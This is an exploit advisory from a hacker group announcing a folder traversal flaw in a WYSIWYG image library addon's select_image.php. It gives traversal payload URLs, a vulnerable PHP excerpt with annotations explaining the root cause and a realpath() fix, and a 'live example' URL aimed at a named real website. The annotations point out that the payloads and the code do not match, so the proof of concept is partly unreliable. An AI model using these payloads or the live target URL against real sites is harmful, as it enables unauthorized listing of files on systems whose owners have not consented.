# Author : Geek
# Title : Wysiwyg Imagelibrary Addons (Folders Traversal)
# Date : Today :P
# Site : Sec4ever.com

# p0x :

    {x} http://localhost/lol/wysiwyg/addons/imagelibrary/select_image.php?dir=full path to public_html or httpdocs
    {x} http://localhost/lol/wysiwyg/addons/imagelibrary/select_image.php?dir=..%2Fhome..%2Fuser..%2Fpublic_html

# Code : 

// Reads the attacker-controllable 'dir' query parameter (empty string when absent).
// prepare_input() is defined outside this excerpt; what it filters, if anything,
// cannot be determined from here.
$get_dir = isset($_GET['dir']) ? prepare_input($_GET['dir']) : "";

......

    // Chooses the directory to open ($opendir) from the request-supplied $get_dir.
    // Root cause of the reported traversal: the decoded value is never canonicalized
    // or compared against an allowed base directory. The only rejections below are
    // "starts with '/'" and "equals the current $leadon"; '..' segments are not
    // inspected at all.
    // Mitigation: resolve the candidate with realpath() and accept it only when the
    // result lies inside realpath() of the intended image root; reject otherwise.
    // NOTE(review): the request examples in this advisory pass plain / URL-encoded
    // paths (one of them absolute), while this excerpt base64-decodes the value and
    // rejects a leading '/'. The excerpt may come from a different version, or the
    // elided code / prepare_input() may differ. Confirm against the deployed file.
    if($get_dir){
        // Decoded without the strict flag, and the result is not checked for failure.
        $dir = base64_decode($get_dir);
        
        // Normalize to a trailing slash.
        if(substr($dir, -1, 1)!='/') {
            $dir = $dir . '/';
        }
        // Default-allow: the path is accepted unless one of the two checks below trips.
        $dirok = true;
        // split() is the legacy POSIX-regex splitter (deprecated in PHP 5.3, removed in 7.0).
        $dirnames = split('/', $dir);
        // Rebuilds the path minus its last two segments (the final one is empty because
        // of the trailing slash), i.e. the parent directory. $dotdotdir is not
        // initialized in this excerpt and takes no part in the validation below.
        for($di=0; $di<sizeof($dirnames); $di++) {
            if($di<(sizeof($dirnames)-2)) {
                $dotdotdir = $dotdotdir . $dirnames[$di] . '/';
            }
        }
        // Check 1: reject values whose first character is '/'.
        // Relative paths that climb with '..' pass this check.
        if(substr($dir, 0, 1)=='/') {
            $dirok = false;
        }
    
        // Check 2: reject a value identical to the current $leadon (set outside this excerpt).
        if($dir == $leadon) {
            $dirok = false;
        }
        
        // Anything that survived both checks replaces the directory being browsed.
        if($dirok) {
            $leadon = $dir;
        }
    }
    
    // $leadon becomes the directory to open. The fallback to '.' covers only an empty
    // or non-existent path, and file_exists() is an existence test, not an
    // authorization check. How $opendir is used afterwards is outside this excerpt
    // (presumably listed to the client; verify).
    $opendir = $leadon;
    if(!$leadon) $opendir = '.';
    if(!file_exists($opendir)) {
        $opendir = '.';
        $leadon = $startdir;
    }
    
    
# Live Example : 

    {X} http://www.tourismhalong.com/includes/wysiwyg/addons/imagelibrary/select_image.php?dir=%2Fhome%2Ftouris8%2Fpublic_html

# Greet'z : b0x,Sec4ever,paulzz,The Sword,The Injector,B07 M4ST3R,Jago :P,LinuxAC,Cmos-CLR :P <3 And All Sec4ever VIP Members And Others :)